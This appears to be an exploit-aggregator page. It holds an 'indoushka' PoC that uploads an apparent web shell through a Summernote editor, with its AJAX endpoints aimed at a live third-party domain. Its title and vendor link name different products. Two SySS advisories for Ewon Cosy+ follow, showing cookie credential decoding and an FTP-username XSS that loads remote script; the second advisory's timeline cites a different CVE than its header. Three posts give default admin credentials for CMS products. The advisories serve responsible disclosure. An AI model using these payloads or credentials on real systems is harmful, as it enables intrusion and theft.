Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] infected item : admin_class.php $data .= ", content = '".htmlentities(str_replace("'","&#x2019;",$content))."' "; if(!empty($_FILES['cover']['tmp_name'])){ $fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name'])); $move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname); $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http'; $hostName = $_SERVER['HTTP_HOST']; $path =explode('/',$_SERVER['PHP_SELF']); $currentPath = '/'.$path[1]; if($move){ $data .= ", cover_img='$fname' "; } } [+] Line 27 : Set your target url. [+] This payload is WYSIWYG based The page can be edited remotely and a malicious executable file can be uploaded ,via summernote is a WYSIWYG editor V: 0.8.18. [+] save payload as poc.html [+] payload : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Manage About Page</title>  <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"> <link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet"> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script> </head> <body> <div class="container mt-5"> <div class="col-lg-12"> <div class="card card-outline card-primary"> <div class="card-body"> <form action="" id="manage-about"> <div class="form-group"> <textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control"> indoushka. </textarea> </div> </form> </div> <div class="card-footer border-top border-info"> <div class="d-flex w-100 justify-content-center align-items-center"> <button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button> </div> </div> </div> </div> </div> <script> $(document).ready(function(){ // Initialize Summernote Editor $('.summernote2').summernote({ height: 300, toolbar: [ ['style', ['style']], ['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']], ['fontname', ['fontname']], ['fontsize', ['fontsize']], ['color', ['color']], ['para', ['ol', 'ul', 'paragraph', 'height']], ['table', ['table']], ['insert', ['link', 'picture']], ['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']] ], callbacks: { onImageUpload: function(files) { saveImg(files[0]); // Handle image upload } } }); // Function to save uploaded image function saveImg(_file) { var data = new FormData(); data.append("file", _file); $.ajax({ data: data, type: "POST", url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image", cache: false, contentType: false, processData: false, success: function(resp) { var image = $('<img>').attr('src', resp); $('.summernote2').summernote("insertNode", image[0]); } }); } }); // Form Submission $('#manage-about').submit(function(e) { e.preventDefault(); start_load(); // Start a loading indicator (you need to define this function) $.ajax({ url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about', data: new FormData($(this)[0]), cache: false, contentType: false, processData: false, method: 'POST', type: 'POST', success: function(resp) { if(resp == 1) { alert_toast('Data successfully saved', "success"); end_load(); // End the loading indicator (you need to define this function) } } }); }); // Optional: Define start_load and end_load functions function start_load() { // Add your loading indicator logic here } function end_load() { // Remove your loading indicator logic here } function alert_toast(message, type) { alert(message); // Basic alert. Replace with a better toast notification if needed. } </script> </body> </html> [+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.php Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-017 Product: Ewon Cosy+ Manufacturer: HMS Industrial Networks AB Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3 Tested Version(s): Firmware Version: 21.2s7 Vulnerability Type: Cleartext Storage of Sensitive Information in a Cookie (CWE-315) Risk Level: Low Solution Status: Fixed Manufacturer Notification: 2024-03-27 Solution Date: 2024-07-18 Public Disclosure: 2024-08-11 CVE Reference: CVE-2024-33892 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" Due to cleartext storage of the password in a cookie, an attacker with appropriate access is able to retrieve the plaintext administrative password. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The credentials used for the basic authentication against the web interface of Cosy+ are stored in the cookie "credentials" after a successful login. An attacker with access to a victim's browser is able to retrieve the administrative password of Cosy+. In addition, the cookie is not secured (no HttpOnly, Secure or SameSite attribute is set). Thus, the credentials could also be extracted in combination with cross-site scripting (XSS) vulnerabilities. Note: During the responsible disclosure process, SySS GmbH became aware of CVE-2015-7928[8], which describes an issue with password autocomplete in Ewon devices. Since this function contains the problematic cookie, this CVE may already describe the insecure cookie. SySS GmbH would therefore like to credit the reporter of CVE-2015-7928, Karn Ganeshen. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. "credentials" cookie value: YWRtOlN1cDNyUzNjcjN0IyM= 2. Decoded credentials: #> echo -n "YWRtOlN1cDNyUzNjcjN0IyM=" | base64 -d adm:Sup3rS3cr3t## Bonus: accessing the cookie from JavaScript code: <script>alert("Credentials can be access via JavaScript" + document.cookie)</script> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: According to the manufacturer note[4], the vulnerability was fixed with the firmware versions 21.2s10 and 22.1s3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-03-26: Vulnerability discovered 2024-03-27: Vulnerability reported to manufacturer 2024-04-02: Inquiry about the status 2024-04-05: Manufacturer acknowlegded the vulnerability and started the analysis 2024-04-10: Two more vulnerabilities reported to the manufacturer (SYSS-2024-032 and SYSS-2024-033) 2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for a publication date for all findings 2024-04-12: Proposed dates for a discussion about publication 2024-04-15: Manufacturer sent a technical overview of planned remediation actions and details about the planned timeline 2024-04-15: Acknowlegded the remediation actions and asked the manufacturer to assign a CVE ID 2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer 2024-05-31: Manufacturer informed that the fix is in completion stage and asked if the blog post[6] can be reviewed by HMS 2024-06-04: Proposed dates to review the blog post draft 2024-06-21: Inquiry about the status 2024-06-21: Received an out-of-office auto reply 2024-07-01: Inquiry about the status 2024-07-04: Inquiry about the status 2024-07-12: Inquiry about the status and letting the manufacturer know that the vulnerability will be published within a talk at DEF CON[7] in August 2024-07-12: Manufacturer responded that the fix is planned by the end of July; manufacturer asked again for reviewing the blog post draft 2024-07-12: Again confirmed reviewing the blog post is possible and asking for the sending of details 2024-07-17: Blog post provided to HMS 2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS 2024-07-23: Inquiry about the status 2024-07-23: Manufacturer reviewed the blog post and confirmed that a fix is provided 2024-07-29: Discussion with HMS about the blog post and final publication actions 2024-08-11: Vulnerability disclosed at DEF CON[7] 2024-08-11: Blog post published[6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Ewon Cosy+ product website https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet [2] SySS Security Advisory SYSS-2024-017 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-017.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Manufacturer note https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf [5] CVE-2024-33892 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33892 [6] Blog post https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/ [7] DEF CON talk https://defcon.org/html/defcon-32/dc-32-speakers.html#54521 [8] CVE-2015-7928 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7928 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail:moritz.abrell@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay4zQACgkQrgyb+PE0 i1Oq5hAApN8Ekc20CgEg5KyIFK18sKBPzSA/SeZcSdUOkv8N05riytWxbVFuLBpS LhHH9spxUjn6Sr36JDp5dISCj9rtajrNE/adIiNC9LUhBRIr2h1ogFfh5zKK8N9D m4CXknQ3b2QQctkuhywyKSKjvNnvxj+k6nDIFlTzXdl3e9cEpisaAFr8zt9/jb7d ZBt8HHrEvJRCa5eBK40r0t42xFiWILh98enmLVCM2VOUnaAxz6JXLTunRSXqC6WH SzEOR/G32z+NxNCphPuswlIqfnhoaOFQ7oP2miuGglDdm5yWQX6E+xtp5HUelmkS DyZ6nUPOmr67lOgOUIhtIQp4zRYNiQAvDv70x9k/RCv+VDG4B5qEffFIbq6JgSCW Q+5iQXfDEJwuj0ePIe/wO+svn7C7LOSfvRfjw39GF0gTeKhPi8cNj5S+Jpl3M6pP XWEHcHzhVze9t5CLFgkh4GtmqH4OvWvFxn8d3x5h21eljloobUNZXAWlUYJdb6Ae gNhWD3IKQJyPo/4cyDC5iZS6QtivjyiQUb6aU6vqKWcR7tlnr7jferG00Q3Sz8R2 ddC8Vw78j2GvzyCibNhSoKGfjQAOhYgfsH8ktRDQ/zDYguT4cHA++V16MbfXwIv0 y3mQqModAAlpqYGVf4783H24kuyP19KewZuj5dSsMTyShIcTkCU= =LXSO -----END PGP SIGNATURE----- </code></pre>

<pre><code>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-016 Product: Ewon Cosy+ Manufacturer: HMS Industrial Networks AB Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3 Tested Version(s): Firmware Version: 21.2s7 Vulnerability Type: Improper Neutralization of Input During Web Page Generation (CWE-79) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2024-03-27 Solution Date: 2024-07-18 Public Disclosure: 2024-08-11 CVE Reference: CVE-2024-33893 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!" Due to improper neutralization of input, an unauthenticated attacker is able to inject HTML and JavaScript code into the administrative web interface of the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: If login against the FTP service of the Cosy+ fails, the submitted username is saved in a log. This log is included in the Cosy+ web interface without neutralizing the content. As a result, an unauthenticated attacker is able to inject HTML/JavaScript code via the username of an FTP login attempt. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. Login attempt against Cosy+ FTP service: #> ftp "<script src=//x>"@192.168.10.33 2. JavaScript is included when visiting the event logs on Cosy+ web interface (http://192.168.10.33/index.shtm#EVLogsTbl): <div class="x-grid-cell-inner " style="text-align:left;"> eftp-Close FTP session (User: <script src="//x"> </div"> Note: The FTP username is limited to 16 characters and therefore the payload length is limited too. However, exploitation is still possible, e.g. by controlling DNS responses or using short URLs, e.g. an emoji domain. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: According to the manufacturer note[4], the vulnerability was fixed with the firmware versions 21.2s10 and 22.1s3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-03-26: Vulnerability discovered 2024-03-27: Vulnerability reported to manufacturer 2024-04-02: Inquiry about the status 2024-04-05: Manufacturer acknowlegded the vulnerability and started the analysis 2024-04-10: Two more vulnerabilities reported to the manufacturer (SYSS-2024-032 and SYSS-2024-033) 2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for a publication date for all findings 2024-04-12: Proposed dates for a discussion about publication 2024-04-15: Manufacturer sent a technical overview of planned remediation actions and details about the planned timeline 2024-04-15: Acknowlegded the remediation actions and asked the manufacturer to assign a CVE ID 2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer 2024-05-31: Manufacturer informed that the fix is in completion stage and asked if the blog post[6] can be reviewed by HMS 2024-06-04: Proposed dates to review the blog post draft 2024-06-21: Inquiry about the status 2024-06-21: Received an out-of-office auto reply 2024-07-01: Inquiry about the status 2024-07-04: Inquiry about the status 2024-07-12: Inquiry about the status and letting the manufacturer know that the vulnerability will be published within a talk at DEF CON[7] in August 2024-07-12: Manufacturer responded that the fix is planned by the end of July; manufacturer asked again for reviewing the blog post draft 2024-07-12: Again confirmed reviewing the blog post is possible and asking for the sending of details 2024-07-17: Blog post provided to HMS 2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS 2024-07-23: Inquiry about the status 2024-07-23: Manufacturer reviewed the blog post and confirmed that a fix is provided 2024-07-29: Discussion with HMS about the blog post and final publication actions 2024-08-11: Vulnerability disclosed at DEF CON[7] 2024-08-11: Blog post published[6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Ewon Cosy+ product website https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet [2] SySS Security Advisory SYSS-2024-016 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-016.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Manufacturer note https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf [5] CVE-2024-33893 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33893 [6] Blog post https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/ [7] DEF CON talk https://defcon.org/html/defcon-32/dc-32-speakers.html#54521 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail:moritz.abrell@syss.de Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay4vsACgkQrgyb+PE0 i1M+GA//R3tvHZW7B21Kf+8aZcVONuL56yzPOyqEdISB0joFi9yvzGkqCJPYws5t vFojVlZT38COf64ZC2siFQCJrtOzMa+zWT3kpSeBFsNQ60Sx79UaCdQVa6GjpZm/ 8qSNWtCpOMGmj95FwYaHuZbKxiSifyIjsVteADqiaysWVx7kXapktPSD2KiOBJSp Ycg81WfRS10ELiUWoLZ5GTXhzQKzH0Tsh6h1qNHWy5GkHLwIQKkzicQ5wR1ZRzK4 o6k8cJySgAqgJ3gmGU9iUUElppPXj7EFOK7m8q0ny5gQpQfz3dMPxJz5eK8zBazd 1c9OjgdZNcgzschhKsl/JX+3YVGQzmNo5rSOIbJS4+7Oe0UcTaggzbgj80GGOakT vLC9GqmgYUsv+yr2Dp10pUg/plySeScDhYlkZ+VN9GDcEVodiKzM6wukj1eDEw0+ 6CzHKnGvKOa322AVnKF+xdB/c+sDCEaD73S47gt8CfG57J7bcpth3Gf9RkLtLFXC U3yiT7FmY/KH7WZvmnyhsk/Go66aGRy0d1hQl/tzdnBVdDn1IZToymnC/YVDxqxc Q9GsDhkpDOyozgrhUdef64RY5ZOzXcpNJvCM1RxjP65ZMxiPpZ0z/3IuGJ+DUWkM f8Sm21hfsgkq8UmnLtSnDCUyPTxJISTK9lwleYkqodqJrXUlUD0= =HV5Q -----END PGP SIGNATURE----- </code></pre>

<pre><code>==================================================================================================================================== | # Title : Lawyer CMS 1.6 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://demo.phpscriptpoint.com/lawyer/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin@gmail.com & pass = 1234 [+] https://www/127.0.0.1/demo/phpscriptpointcom/lawyer//admin Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : JobSeeker CMS 1.5 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://demo.phpscriptpoint.com/jobseeker/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin@gmail.com & pass = 1234 [+] https://www/127.0.0.1/demo/phpscriptpointcom/jobseeker/admin Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Bhojon restaurant management system v3.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.bdtask.com/restaurant-management-system.php#live_demo | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin@example.com & pass = 12345 [+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdate Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>